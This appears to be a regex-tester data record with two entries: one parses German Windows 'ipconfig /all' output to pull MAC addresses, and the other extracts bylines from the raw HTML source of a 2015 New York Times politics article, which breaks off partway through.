DHCP aktiviert. . . . . . . . . . : Ja
Autokonfiguration aktiviert . . . : Ja
Drahtlos-LAN-Adapter Drahtlosnetzwerkverbindung:
Medienstatus. . . . . . . . . . . : Medium getrennt
Verbindungsspezifisches DNS-Suffix: stollfuss.net
Beschreibung. . . . . . . . . . . : Intel(R) Centrino(R) Wireless-N 1000
Physikalische Adresse . . . . . . : 8C-A9-82-2E-0C-FE
DHCP aktiviert. . . . . . . . . . : Ja
Autokonfiguration aktiviert . . . : Ja
Ethernet-Adapter LAN-Verbindung:
Verbindungsspezifisches DNS-Suffix:
Beschreibung. . . . . . . . . . . : Atheros AR8121/AR8113/AR8114 PCI-E Ethernet Controller(NDIS6.20)
Physikalische Adresse . . . . . . : 70-71-BC-D6-BF-77
DHCP aktiviert. . . . . . . . . . : Nein
Autokonfiguration aktiviert . . . : Ja
Verbindungslokale IPv6-Adresse . : fe80::8517:61e4:94f0:173a%11(Bevorzugt)
IPv4-Adresse . . . . . . . . . . : 192.168.2.10(Bevorzugt)
Subnetzmaske . . . . . . . . . . : 255.255.255.0
Standardgateway . . . . . . . . . : 192.168.2.1
DHCPv6-IAID . . . . . . . . . . . : 242250172
DHCPv6-Client-DUID. . . . . . . . : 00-01-00-01-1C-64-1F-D5-70-71-BC-D6-BF-77
DNS-Server . . . . . . . . . . . : 192.168.2.1
NetBIOS über TCP/IP . . . . . . . : Aktiviert
Tunneladapter isatap.stollfuss.net:
Medienstatus. . . . . . . . . . . : Medium getrennt
Verbindungsspezifisches DNS-Suffix:
Beschreibung. . . . . . . . . . . : Microsoft-ISATAP-Adapter
Physikalische Adresse . . . . . . : 00-00-00-00-00-00-00-E0
DHCP aktiviert. . . . . . . . . . : Nein
Autokonfiguration aktiviert . . . : Ja
Tunneladapter LAN-Verbindung* 11:
Medienstatus. . . . . . . . . . . : Medium getrennt
Verbindungsspezifisches DNS-Suffix:
Beschreibung. . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
Physikalische Adresse . . . . . . : 00-00-00-00-00-00-00-E0
DHCP aktiviert. . . . . . . . . . : Nein
Autokonfiguration aktiviert . . . : Ja
Tunneladapter isatap.{5B6B6509-4089-4D8B-873E-6C9BCECA9C38}:
Medienstatus. . . . . . . . . . . : Medium getrennt
Verbindungsspezifisches DNS-Suffix:
Beschreibung. . . . . . . . . . . : Microsoft-ISATAP-Adapter #2
Physikalische Adresse . . . . . . : 00-00-00-00-00-00-00-E0
DHCP aktiviert. . . . . . . . . . : Nein
Autokonfiguration aktiviert . . . : Ja
Tunneladapter Reusable ISATAP Interface {36BFBE43-5F0F-42E3-89B3-B581DF95C122}:
Medienstatus. . . . . . . . . . . : Medium getrennt
Verbindungsspezifisches DNS-Suffix:
Beschreibung. . . . . . . . . . . : Microsoft-ISATAP-Adapter #3
Physikalische Adresse . . . . . . : 00-00-00-00-00-00-00-E0
DHCP aktiviert. . . . . . . . . . : Nein
Autokonfiguration aktiviert . . . : Ja
Tunneladapter isatap.{BE04D9C2-65F1-4777-9918-1CFEBAED5268}:
Medienstatus. . . . . . . . . . . : Medium getrennt
Verbindungsspezifisches DNS-Suffix:
Beschreibung. . . . . . . . . . . : Microsoft-ISATAP-Adapter #4
Physikalische Adresse . . . . . . : 00-00-00-00-00-00-00-E0
DHCP aktiviert. . . . . . . . . . : Nein
Autokonfiguration aktiviert . . . : Ja
Tunneladapter Reusable ISATAP Interface {A887E6BC-C744-4C0E-A17A-70E04B3DC3E2}:
Medienstatus. . . . . . . . . . . : Medium getrennt
Verbindungsspezifisches DNS-Suffix:
Beschreibung. . . . . . . . . . . : Microsoft-ISATAP-Adapter #5
Physikalische Adresse . . . . . . : 00-00-00-00-00-00-00-E0
DHCP aktiviert. . . . . . . . . . : Nein
Autokonfiguration aktiviert . . . : Ja
Tunneladapter isatap.{BEA2272D-AC7D-47E1-A3A4-D7273CF9CAFD}:
Medienstatus. . . . . . . . . . . : Medium getrennt
Verbindungsspezifisches DNS-Suffix:
Beschreibung. . . . . . . . . . . : Microsoft-ISATAP-Adapter #6
Physikalische Adresse . . . . . . : 00-00-00-00-00-00-00-E0
DHCP aktiviert. . . . . . . . . . : Nein
Autokonfiguration aktiviert . . . : Ja
Tunneladapter isatap.{20DD8A4C-A552-43A5-9B81-ABA8D73754B3}:
Medienstatus. . . . . . . . . . . : Medium getrennt
Verbindungsspezifisches DNS-Suffix:
Beschreibung. . . . . . . . . . . : Microsoft-ISATAP-Adapter #7
Physikalische Adresse . . . . . . : 00-00-00-00-00-00-00-E0
DHCP aktiviert. . . . . . . . . . : Nein
Autokonfiguration aktiviert . . . : Ja | Parse "ipconfig /all" output and grab all MAC Adresses | 2015-06-14T11:20:55.000Z |
<([\S]+) class=\"(byline[\S]+|author|by)\"[^>]+>([^<]*)<\/\1> | <!DOCTYPE html> <!--[if (gt IE 9)|!(IE)]> <!--> <html lang="en" class="no-js section-politics format-medium tone-news app-article page-theme-standard has-large-lede" itemid="http://www.nytimes.com/2015/11/10/us/politics/bush-allies-threaten-wave-of-harsh-attacks-on-rubio-an-ex-mentee.html" itemtype="http://schema.org/NewsArticle" itemscope xmlns:og="http://opengraphprotocol.org/schema/"> <!--<![endif]--> <!--[if IE 9]> <html lang="en" class="no-js ie9 lt-ie10 section-politics format-medium tone-news app-article page-theme-standard has-large-lede" xmlns:og="http://opengraphprotocol.org/schema/"> <![endif]--> <!--[if IE 8]> <html lang="en" class="no-js ie8 lt-ie10 lt-ie9 section-politics format-medium tone-news app-article page-theme-standard has-large-lede" xmlns:og="http://opengraphprotocol.org/schema/"> <![endif]--> <!--[if (lt IE 8)]> <html lang="en" class="no-js lt-ie10 lt-ie9 lt-ie8 section-politics format-medium tone-news app-article page-theme-standard has-large-lede" xmlns:og="http://opengraphprotocol.org/schema/"> <![endif]--> <head> <title>Bush Allies Threaten Wave of Harsh Attacks on Rubio, an Ex-Mentee - The New York Times</title> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /><script type="text/javascript">window.NREUM||(NREUM={}),__nr_require=function(e,n,t){function r(t){if(!n[t]){var o=n[t]={exports:{}};e[t][0].call(o.exports,function(n){var o=e[t][1][n];return r(o?o:n)},o,o.exports)}return n[t].exports}if("function"==typeof __nr_require)return __nr_require;for(var o=0;o<t.length;o++)r(t[o]);return r}({QJf3ax:[function(e,n){function t(e){function n(n,t,a){e&&e(n,t,a),a||(a={});for(var u=c(n),f=u.length,s=i(a,o,r),p=0;f>p;p++)u[p].apply(s,t);return s}function a(e,n){f[e]=c(e).concat(n)}function c(e){return f[e]||[]}function u(){return t(n)}var f={};return{on:a,emit:n,create:u,listeners:c,_events:f}}function r(){return{}}var o="nr@context",i=e("gos");n.exports=t()},{gos:"7eSDFh"}],ee:[function(e,n){n.exports=e("QJf3ax")},{}],3:[function(e,n){function t(e){return function(){r(e,[(new Date).getTime()].concat(i(arguments)))}}var r=e("handle"),o=e(1),i=e(2);"undefined"==typeof window.newrelic&&(newrelic=window.NREUM);var a=["setPageViewName","addPageAction","setCustomAttribute","finished","addToTrace","inlineHit","noticeError"];o(a,function(e,n){window.NREUM[n]=t("api-"+n)}),n.exports=window.NREUM},{1:12,2:13,handle:"D5DuLP"}],gos:[function(e,n){n.exports=e("7eSDFh")},{}],"7eSDFh":[function(e,n){function t(e,n,t){if(r.call(e,n))return e[n];var o=t();if(Object.defineProperty&&Object.keys)try{return Object.defineProperty(e,n,{value:o,writable:!0,enumerable:!1}),o}catch(i){}return e[n]=o,o}var r=Object.prototype.hasOwnProperty;n.exports=t},{}],D5DuLP:[function(e,n){function t(e,n,t){return r.listeners(e).length?r.emit(e,n,t):void(r.q&&(r.q[e]||(r.q[e]=[]),r.q[e].push(n)))}var r=e("ee").create();n.exports=t,t.ee=r,r.q={}},{ee:"QJf3ax"}],handle:[function(e,n){n.exports=e("D5DuLP")},{}],XL7HBI:[function(e,n){function t(e){var n=typeof e;return!e||"object"!==n&&"function"!==n?-1:e===window?0:i(e,o,function(){return r++})}var r=1,o="nr@id",i=e("gos");n.exports=t},{gos:"7eSDFh"}],id:[function(e,n){n.exports=e("XL7HBI")},{}],G9z0Bl:[function(e,n){function t(){var e=d.info=NREUM.info,n=f.getElementsByTagName("script")[0];if(e&&e.licenseKey&&e.applicationID&&n){c(p,function(n,t){n in e||(e[n]=t)});var t="https"===s.split(":")[0]||e.sslForHttp;d.proto=t?"https://":"http://",a("mark",["onload",i()]);var r=f.createElement("script");r.src=d.proto+e.agent,n.parentNode.insertBefore(r,n)}}function r(){"complete"===f.readyState&&o()}function o(){a("mark",["domContent",i()])}function i(){return(new Date).getTime()}var a=e("handle"),c=e(1),u=window,f=u.document;e(2);var s=(""+location).split("?")[0],p={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",agent:"js-agent.newrelic.com/nr-686.min.js"},d=n.exports={offset:i(),origin:s,features:{}};f.addEventListener?(f.addEventListener("DOMContentLoaded",o,!1),u.addEventListener("load",t,!1)):(f.attachEvent("onreadystatechange",r),u.attachEvent("onload",t)),a("mark",["firstbyte",i()])},{1:12,2:3,handle:"D5DuLP"}],loader:[function(e,n){n.exports=e("G9z0Bl")},{}],12:[function(e,n){function t(e,n){var t=[],o="",i=0;for(o in e)r.call(e,o)&&(t[i]=n(o,e[o]),i+=1);return t}var r=Object.prototype.hasOwnProperty;n.exports=t},{}],13:[function(e,n){function t(e,n,t){n||(n=0),"undefined"==typeof t&&(t=e?e.length:0);for(var r=-1,o=t-n||0,i=Array(0>o?0:o);++r<o;)i[r]=e[n+r];return i}n.exports=t},{}]},{},["G9z0Bl"]);</script> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <link rel="shortcut icon" href="http://static01.nyt.com/favicon.ico" /> <link rel="apple-touch-icon-precomposed" sizes="144×144" href="http://static01.nyt.com/images/icons/ios-ipad-144x144.png" /> <link rel="apple-touch-icon-precomposed" sizes="114×114" href="http://static01.nyt.com/images/icons/ios-iphone-114x144.png" /> <link rel="apple-touch-icon-precomposed" href="http://static01.nyt.com/images/icons/ios-default-homescreen-57x57.png" /> <meta name="sourceApp" content="nyt-v5" /> <meta id="applicationName" name="applicationName" content="article" /> <meta id="foundation-build-id" name="foundation-build-id" content="" /> <link rel="canonical" href="http://www.nytimes.com/2015/11/10/us/politics/bush-allies-threaten-wave-of-harsh-attacks-on-rubio-an-ex-mentee.html" /> <link rel="alternate" href="http://mobile.nytimes.com/2015/11/10/us/politics/bush-allies-threaten-wave-of-harsh-attacks-on-rubio-an-ex-mentee.html" /> <link rel="amphtml" href="http://mobile.nytimes.com/2015/11/10/us/politics/bush-allies-threaten-wave-of-harsh-attacks-on-rubio-an-ex-mentee.amp.html" /> <meta property="al:android:url" content="nytimes://reader/id/100000004027396" /> <meta property="al:android:package" content="com.nytimes.android" /> <meta property="al:android:app_name" content="NYTimes" /> <meta name="twitter:app:name:googleplay" content="NYTimes" /> <meta name="twitter:app:id:googleplay" content="com.nytimes.android" /> <meta name="twitter:app:url:googleplay" content="nytimes://reader/id/100000004027396" /> <link rel="alternate" href="android-app://com.nytimes.android/nytimes/reader/id/100000004027396" /> <meta name="robots" content="noarchive" /> <meta itemprop="alternativeHeadline" name="hdl_p" content="Bush Allies Threaten Wave of Harsh Attacks on Rubio, an Ex-Protégé" /> <meta name="channels" content="NytNow" /> <meta itemprop="description" name="description" content="Seething with anger and alarmed over Mr. Rubio’s rise, aides to Mr. Bush and his allies are privately threatening attacks that will try to undercut Mr. Rubio as unaccomplished and unprepared." /> <meta itemprop="genre" content="News" /> <meta itemprop="identifier" name="articleid" content="100000004027396" /> <meta itemprop="usageTerms" name="usageTerms" content="http://www.nytimes.com/content/help/rights/sale/terms-of-sale.html" /> <meta itemprop="inLanguage" content="en-US" /> <meta name="hdl" content="Bush Allies Threaten Wave of Harsh Attacks on Rubio, an Ex-Mentee" /> <meta name="col" content="" id="column-name" /> <meta name="pdate" content="20151109" /> <meta name="utime" content="20151110012219" /> <meta name="ptime" content="20151109210920" /> <meta name="DISPLAYDATE" content="Nov. 9, 2015" /> <meta name="dat" content="Nov. 9, 2015" /> <meta name="lp" content="Seething with anger and alarmed over Mr. Rubio’s rise, aides to Mr. Bush and his allies are privately threatening attacks that will try to undercut Mr. Rubio as unaccomplished and unprepared." /> <meta name="msapplication-starturl" content="http://www.nytimes.com" /> <meta name="cre" content="The New York Times" /> <meta name="slug" content="10rubiobush" /> <meta property="article:collection" content="http://json8.nytimes.com/services/json/sectionfronts/politics/index.jsonp" /> <meta name="sectionfront_jsonp" content="http://json8.nytimes.com/services/json/sectionfronts/politics/index.jsonp" /> <meta property="og:url" content="http://www.nytimes.com/2015/11/10/us/politics/bush-allies-threaten-wave-of-harsh-attacks-on-rubio-an-ex-mentee.html" /> <meta property="og:type" content="article" /> <meta property="og:title" content="Bush Allies Threaten Wave of Harsh Attacks on Rubio, an Ex-Mentee" /> <meta property="og:description" content="Seething with anger and alarmed over Mr. Rubio’s rise, aides to Mr. Bush and his allies are privately threatening attacks that will try to undercut Mr. Rubio as unaccomplished and unprepared." /> <meta property="article:published" itemprop="datePublished" content="2015-11-09" /> <meta property="article:section" itemprop="articleSection" content="Politics" /> <meta property="article:section-taxonomy-id" itemprop="articleSection" content="23FD6C8B-62D5-4CEA-A331-6C2A9A1223BE" /> <meta property="article:section_url" content="http://www.nytimes.com/pages/national/index.html" /> <meta property="fb:app_id" content="9869919170" /> <meta name="twitter:card" value="summary" /> <meta name="twitter:site" value="@nytimes" /> <meta property="twitter:url" content="http://www.nytimes.com/2015/11/10/us/politics/bush-allies-threaten-wave-of-harsh-attacks-on-rubio-an-ex-mentee.html" /> <meta property="twitter:title" content="Bush Allies Threaten Wave of Harsh Attacks on Rubio, an Ex-Mentee" /> <meta property="twitter:description" content="Seething with anger and alarmed over Mr. Rubio’s rise, aides to Mr. Bush and his allies are privately threatening attacks that will try to undercut Mr. Rubio as unaccomplished and unprepared." /> <meta name="author" content="Maggie Haberman and Michael Barbaro" /> <meta name="tone" content="news" id="article-tone" /> <meta name="byl" content="By MAGGIE HABERMAN and MICHAEL BARBARO" /> <meta name="PT" content="article" /> <meta name="CG" content="us" /> <meta name="SCG" content="politics" /> <meta name="PST" content="News" /> <meta name="tom" content="News" /> <meta name="edt" content="NewYork" /> <meta property="og:image" content="http://static01.nyt.com/images/2015/11/10/us/10BUSHRUBIO1/10BUSHRUBIO1-facebookJumbo-v2.jpg" /> <meta property="article:author" content="" /> <meta property="article:author" content="http://topics.nytimes.com/top/reference/timestopics/people/b/michael_barbaro/index.html" /> <meta property="article:tag" content="Presidential Election of 2016" /> <meta name="des" content="Presidential Election of 2016" /> <meta property="article:tag" content="Endorsements" /> <meta name="des" content="Endorsements" /> <meta property="article:tag" content="Republican Party" /> <meta name="org" content="Republican Party" /> <meta property="article:tag" content="Bush, Jeb" /> <meta name="per" content="Bush, Jeb" /> <meta property="article:tag" content="Rubio, Marco" /> <meta name="per" content="Rubio, Marco" /> <meta name="keywords" content="Presidential Election of 2016,Endorsements,Republican Party,Bush Jeb,Rubio Marco" /> <meta name="news_keywords" content="2016 Presidential Election,Political endorsement,Republicans,Jeb Bush,Marco Rubio" /> <meta property="article:modified" itemprop="dateModified" content="2015-11-10" /> <meta name="thumbnail_150" content="http://static01.nyt.com/images/2015/11/10/us/10BUSHRUBIO1/10BUSHRUBIO1-thumbLarge-v2.jpg" /> <meta name="thumbnail_150_height" content="150" /> <meta name="thumbnail_150_width" content="150" /> <meta property="twitter:image" content="http://static01.nyt.com/images/2015/11/10/us/10BUSHRUBIO1/10BUSHRUBIO1-thumbLarge-v2.jpg" /> <meta itemprop="thumbnailUrl" name="thumbnail" content="http://static01.nyt.com/images/2015/11/10/us/10BUSHRUBIO1/10BUSHRUBIO1-thumbStandard-v2.jpg" /> <meta name="thumbnail_height" content="75" /> <meta name="thumbnail_width" content="75" /> <meta name="dfp-ad-unit-path" content="us/politics" /> <!--[if (gt IE 9)|!(IE)]> <!--> <link rel="stylesheet" type="text/css" media="screen" href="http://a1.nyt.com/assets/article/20151106-152942/css/article/article/styles.css" /> <!--<![endif]--> <!--[if lte IE 9]> <link rel="stylesheet" type="text/css" media="screen" href="http://a1.nyt.com/assets/article/20151106-152942/css/article/article/styles-ie.css" /> <![endif]--> <link rel="stylesheet" type="text/css" media="print" href="http://a1.nyt.com/assets/article/20151106-152942/css/article/article/styles-print.css" /> <script id="page-config-data" type="text/json"> {"pageconfig":{"ledeMediaSize":"large","keywords":["article-medium","has-embedded-interactive"]}}</script> <script id="display_overrides"> [] </script> <script type="text/javascript">var googletag=googletag||{};googletag.cmd=googletag.cmd||[],function(){var t=document.createElement("script");t.async=!0,t.type="text/javascript";t.src="http://www.googletagservices.com/tag/js/gpt.js";var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(t,o)}();</script> <script id="abtestconfig" type="application/json"> [ { "testId": "0012", "testName": "tallWatchingModule", "throttle": 1.0, "allocation": 0.9, "variants": 1, "applications": ["homepage"] }, { "testId": "0033", "testName": "recommendedLabelTest", "throttle": 1, "allocation": 0.833, "variants": 5, "applications": ["article"] }, { "testId": "0036", "testName": "velcroSocialFollow", "throttle": 0.1, "allocation": 0.5, "variants": 1, "applications": ["article", "homepage"] }, { "testId": "0051", "testName": "shuffleRecommendations", "throttle": 1.0, "allocation": 0.667, "variants": 1, "applications": ["article"] }, { "testId": "0052", "testName": "paidPostDriver", "throttle": 1.0, "allocation": 0.875, "variants": 7, "applications": ["article"] }, { "testId": "0061", "testName": "paidPostFivePackMock", "throttle": 0, "allocation": 0, "variants": 1, "applications": ["homepage"] }, { "testId": "0063", "testName": "paidPostFivePack", "throttle": 1, "allocation": 0.5, "variants": 1, "applications": ["homepage"] }, { "testId": "0064", "testName": "realEstateSearch", "throttle": 1, "allocation": 1, "variants": 1, "applications": ["realestate", "article"] }, { "testId": "0066", "testName": "ribbonChartbeatMostEmailed", "throttle": 1, "allocation": 0.5, "variants": 1, "applications": ["article"] }, { "testId": "0067", "testName": "pinnedMasthead", "throttle": 0.02, "allocation": 0.5, "variants": 1, "applications": ["homepage"] }, { "testId": "0069", "testName": "coloredSharetools", "throttle": 1, "allocation": 0.5, "variants": 1, "applications": ["slideshow"] } ] </script> <script id="user-info-data" type="application/json"> { "meta": {}, "data": { "id": "0", "name": "", "subscription": ["","_RPV"], "demographics": {} } } </script> <script> var require = { baseUrl: 'http://a1.nyt.com/assets/', waitSeconds: 20, paths: { 'foundation': 'article/20151106-152942/js/foundation', 'shared': 'article/20151106-152942/js/shared', 'article': 'article/20151106-152942/js/article', 'application': 'article/20151106-152942/js/article/article', 'videoFactory': 'http://static01.nyt.com/js2/build/video/2.0/videofactoryrequire', 'videoPlaylist': 'http://static01.nyt.com/js2/build/video/players/extended/2.0/appRequire', 'auth/mtr': 'http://static01.nyt.com/js/mtr', 'auth/growl': 'http://static01.nyt.com/js/auth/growl/default', 'vhs': 'http://static01.nyt.com/video/vhs/build/vhs-2.x.min' }, map: { '*': { 'article/main': 'article/article/main' } } }; </script> <!--[if (gte IE 9)|!(IE)]> <!--> <script data-main="foundation/main" src="http://a1.nyt.com/assets/article/20151106-152942/js/foundation/lib/framework.js"></script> <!--<![endif]--> <!--[if lt IE 9]> <script> require.map['*']['foundation/main'] = 'foundation/legacy_main'; </script> <script data-main="foundation/legacy_main" src="http://a1.nyt.com/assets/article/20151106-152942/js/foundation/lib/framework.js"></script> <![endif]--> <script> window.magnum.processFlags(["limitFabrikSave","moreFollowSuggestions","unfollowComments","followFeature","fullbleedTweaks","videoVHSCover","videoVHSShareTools","allTheEmphases","androidDeepLinks","autoPlayVideos","newsEventHierarchy","standaloneSlideshowPromo","freeTrial","dedupeWhatsNext","ribbonNavArrowVisibility","sprinklePaidPost","TMagFonts3","standardizeWhatsNextCollection","onlyLayoutA","iOSDeepLinks"]); </script> <script> require(['foundation/main'], function () { require(['auth/mtr', 'auth/growl']); }); </script> <script src="http://a1.nyt.com/assets/article/20151106-152942/js/article/article/layout.js"></script></head> <body> <style> .lt-ie10 .messenger.suggestions { display: block !important; height: 50px; } .lt-ie10 .messenger.suggestions .message-bed { background-color: #f8e9d2; border-bottom: 1px solid #ccc; } .lt-ie10 .messenger.suggestions .message-container { padding: 11px 18px 11px 30px; } .lt-ie10 .messenger.suggestions .action-link { font-family: "nyt-franklin", arial, helvetica, sans-serif; font-size: 10px; font-weight: bold; color: #a81817; text-transform: uppercase; } .lt-ie10 .messenger.suggestions .alert-icon { background: url('http://i1.nyt.com/images/icons/icon-alert-12x12-a81817.png') no-repeat; width: 12px; height: 12px; display: inline-block; margin-top: -2px; float: none; } .lt-ie10 .masthead, .lt-ie10 .navigation, .lt-ie10 .comments-panel { margin-top: 50px !important; } .lt-ie10 .ribbon { margin-top: 97px !important; } </style> <div id="suggestions" class="suggestions messenger nocontent robots-nocontent" style="display:none;"> <div class="message-bed"> <div class="message-container last-message-container"> <div class="message"> <span class="message-content"> <i class="icon alert-icon"></i><span class="message-title">NYTimes.com no longer supports Internet Explorer 9 or earlier. Please upgrade your browser.</span> <a href="http://www.nytimes.com/content/help/site/ie9-support.html" class="action-link">LEARN MORE »</a> </span> </div> </div> </div> </div> <div id="shell" class="shell"> <header id="masthead" class="masthead masthead-theme-standard" role="banner"> <div class="container"> <div class="quick-navigation button-group"> <button class="button sections-button"><i class="icon sprite-icon"></i><span class="button-text">Sections</span></button> <button class="button home-button" data-href="http://www.nytimes.com/" title="Go to the home page to see the latest top stories."><i class="icon sprite-icon"></i> <span class="button-text">Home</span> </button> <button class="button search-button"><i class="icon sprite-icon"></i><span class="button-text">Search</span></button> <a class="button skip-button skip-to-content visually-hidden focusable" href="#story-header">Skip to content</a> <a class="button skip-button skip-to-navigation visually-hidden focusable" href="#site-index-navigation">Skip to navigation</a> <a class="button skip-button skip-to-mobile visually-hidden focusable" href="http://mobile.nytimes.com/2015/11/10/us/politics/bush-allies-threaten-wave-of-harsh-attacks-on-rubio-an-ex-mentee.html">View mobile version</a> </div><!-- close button-group --> <div class="branding"> <h2 class="branding-heading"> <a id="branding-heading-link" href="http://www.nytimes.com/"> <span class="visually-hidden">The New York Times</span> </a> </h2> <script>window.magnum.writeLogo('small', 'http://a1.nyt.com/assets/article/20151106-152942/images/foundation/logos/', 'us', 'masthead-theme-standard', 'standard', 'branding-heading-link');</script> </div><!-- close branding --> <div class="story-meta"> <h6 class="kicker"><span class="kicker-label"><a href="http://www.nytimes.com/pages/politics/index.html">Politics</a></span><span class="pipe">|</span>Bush Allies Threaten Wave of Harsh Attacks on Rubio, an Ex-Mentee</h6> </div><!-- close story-meta --> <div id="TopNavAd" class="ad top-nav-ad nocontent robots-nocontent"> <div class="accessibility-ad-header visually-hidden"> <p>Advertisement</p> </div> </div> <div class="user-tools"> <div id="sharetools-masthead" aria-label="tools" role="group" class="sharetools theme-classic sharetools-masthead " data-shares="email,facebook,twitter,show-all|More" data-url="http://www.nytimes.com/2015/11/10/us/politics/bush-allies-threaten-wave-of-harsh-attacks-on-rubio-an-ex-mentee.html" data-title="Bush Allies Threaten Wave of Harsh Attacks on Rubio, an Ex-Mentee" data-author="By MAGGIE HABERMAN and MICHAEL BARBARO" data-media="http://static01.nyt.com/images/2015/11/10/us/10BUSHRUBIO1/10BUSHRUBIO1-jumbo.jpg" data-description="Seething with anger and alarmed over Mr. Rubio’s rise, aides to Mr. Bush and his allies are privately threatening attacks that will try to undercut Mr. Rubio as unaccomplished and unprepared." data-publish-date="November 9, 2015" > <div class="ad sharetools-inline-article-ad hidden nocontent robots-nocontent"> </div> </div><!-- close shareTools --> <button class="button search-button"><i class="icon sprite-icon"></i><span class="button-text">Search</span></button> <div id="Bar1" class="ad bar1-ad nocontent robots-nocontent"></div> <div class="user-tools-button-group button-group"> <button class="button login-button login-modal-trigger hidden">Log In</button> <button class="button notifications-button hidden"><i class="icon sprite-icon"></i><span class="button-text">0</span></button> <button class="button user-settings-button"><i class="icon sprite-icon"></i><span class="button-text">Settings</span></button> </div><!-- close user-tools-button-group --> </div><!-- close user-tools --> </div><!-- close container --> <div class="search-flyout-panel flyout-panel"> <button class="button close-button" type="button"><i class="icon"></i><span class="visually-hidden">Close search</span></button> <div class="ad"> <div id="SponsorAd" class="sponsor-ad"> <small class="ad-sponsor">search sponsored by</small> </div> </div> <nav class="search-form-control form-control layout-horizontal"> <form class="search-form" role="search"> <div class="control"> <div class="label-container visually-hidden"> <label for="search-input">Search NYTimes.com</label> </div> <div class="field-container"> <input id="search-input" name="search-input" type="text" class="search-input text" autocomplete="off" placeholder="Search NYTimes.com" /> <button type="button" class="button clear-button" tabindex="-1" aria-describedby="clear-search-input"><i class="icon"></i><span id="clear-search-input" class="visually-hidden">Clear this text input</span></button> <div class="auto-suggest" style="display: none;"> <ol></ol> </div> <button class="button submit-button" type="submit">Go</button> </div> </div><!-- close control --> </form> </nav> </div><!-- close flyout-panel --> <div id="notification-modals" class="notification-modals"></div> <span class="story-short-url"><a href="http://nyti.ms/1OAA9du">http://nyti.ms/1OAA9du</a></span></header> <nav id="ribbon" class="ribbon ribbon-start nocontent robots-nocontent" aria-hidden="true"> <div class="nocontent robots-nocontent"> <ol class="ribbon-menu"> <li class="collection ribbon-loader"> <div class="loader loader-t-logo-32x32-ecedeb-ffffff"><span class="visually-hidden">Loading...</span></div> </li> </ol> <div class="ribbon-navigation-container"> <nav class="ribbon-navigation next"> <span class="visually-hidden">See next articles</span> <div class="arrow arrow-right"> <div class="arrow-conceal"></div> </div> </nav> <nav class="ribbon-navigation previous"> <span class="visually-hidden">See previous articles</span> <div class="arrow arrow-left"> <div class="arrow-conceal"></div> </div> </nav> </div> </div><!-- close nocontent --> </nav> <nav id="navigation" class="navigation" role="navigation"> </nav> <!-- close navigation --> <nav id="mobile-navigation" class="mobile-navigation hidden"> </nav> <div id="navigation-edge" class="navigation-edge"></div> <div id="page" class="page"> <main id="main" class="main" role="main"> <div id="TopAd" class="ad top-ad nocontent robots-nocontent"> <div class="accessibility-ad-header visually-hidden"> <p>Advertisement</p> </div> </div> <article id="story" class="story theme-main"> <header id="story-header" class="story-header"> <div id="story-meta" class="story-meta "> <div class="ad sponsortile-ad hidden nocontent robots-nocontent"> <div class="caption">Supported by</div> <div id="sponsortile" class="ad sponsortile-ad-creative"></div> </div> <h3 class="kicker"> <span class="kicker-label"><a href="http://www.nytimes.com/pages/politics/index.html">Politics</a></span> </h3> <h1 itemprop="headline" id="story-heading" class="story-heading">Bush Allies Threaten Wave of Harsh Attacks on Rubio, an Ex-Mentee</h1> <div id="story-meta-footer" class="story-meta-footer"> <p class="byline-dateline"><span class="byline" itemprop="author creator" itemscope itemtype="http://schema.org/Person" >By <span class="byline-author" data-byline-name="MAGGIE HABERMAN" itemprop="name" data-twitter-handle="maggieNYT">MAGGIE HABERMAN</span> and </span><span class="byline" itemprop="author creator" itemscope itemtype="http://schema.org/Person" itemid="http://topics.nytimes.com/top/reference/timestopics/people/b/michael_barbaro/index.html"><a href="http://topics.nytimes.com/top/reference/timestopics/people/b/michael_barbaro/index.html" rel="author" title="More Articles by MICHAEL BARBARO"><span class="byline-author" data-byline-name="MICHAEL BARBARO" itemprop="name" data-twitter-handle="mikiebarb">MICHAEL BARBARO</span></a></span><time class="dateline" datetime="2015-11-09">NOV. 9, 2015</time> </p> <div class="inside-story"> <span class="menu-label">Inside</span> <ul class="inside-story-menu"></ul> </div> </div><!-- close story-meta-footer --> </div><!-- close story-meta --> </header> <div id="story-body" class="story-body"> <div class="lede-container"> <figure id="media-100000004027771" class="media photo lede layout-large-horizontal" data-media-action="modal" itemprop="associatedMedia" itemscope itemid="http://static01.nyt.com/images/2015/11/10/us/10BUSHRUBIO1/10BUSHRUBIO1-master675.jpg" itemtype="http://schema.org/ImageObject" aria-label="media" role="group"> <span class="visually-hidden">Photo</span> <div class="image"> <img src="http://static01.nyt.com/images/2015/11/10/us/10BUSHRUBIO1/10BUSHRUBIO1-master675.jpg" alt="" class="media-viewer-candidate" data-mediaviewer-src="http://static01.nyt.com/images/2015/11/10/us/10BUSHRUBIO1/10BUSHRUBIO1-superJumbo.jpg" data-mediaviewer-caption="Former Gov. Jeb Bush of Florida at La Casa de Esperanza, a community organization and school in Waukesha, Wis., on Monday." data-mediaviewer-credit="Michael Appleton for The New York Times" itemprop="url" itemid="http://static01.nyt.com/images/2015/11/10/us/10BUSHRUBIO1/10BUSHRUBIO1-master675.jpg"/> <meta itemprop="height" content="451" /> <meta itemprop="width" content="675" /> </div> <figcaption class="caption" itemprop="caption description"> <span class="caption-text">Former Gov. Jeb Bush of Florida at La Casa de Esperanza, a community organization and school in Waukesha, Wis., on Monday.</span> <span class="credit" itemprop="copyrightHolder"> <span class="visually-hidden">Credit</span> Michael Appleton for The New York Times </span> </figcaption> </figure> <div class="lede-container-ads"> <div id="lede-ad" class="ad lede-ad marginalia-anchor-ad nocontent robots-nocontent"><div class="accessibility-ad-header visually-hidden"> <p>Advertisement</p> </div> <a class="visually-hidden skip-to-text-link" href="#story-continues-1">Continue reading the main story</a> </div> </div> </div> <div id="byline-sharetools-container" class="byline-sharetools-container"> <div id="sharetools-story" aria-label="tools" role="group" class="sharetools theme-classic sharetools-story " data-shares="email,facebook|Share,twitter|Tweet,save,show-all|more,ad" data-url="http://www.nytimes.com/2015/11/10/us/politics/bush-allies-threaten-wave-of-harsh-attacks-on-rubio-an-ex-mentee.html" data-title="Bush Allies Threaten Wave of Harsh Attacks on Rubio, an Ex-Mentee" data-author="By MAGGIE HABERMAN and MICHAEL BARBARO" data-media="http://static01.nyt.com/images/2015/11/10/us/10BUSHRUBIO1/10BUSHRUBIO1-jumbo.jpg" data-description="Seething with anger and alarmed over Mr. Rubio’s rise, aides to Mr. 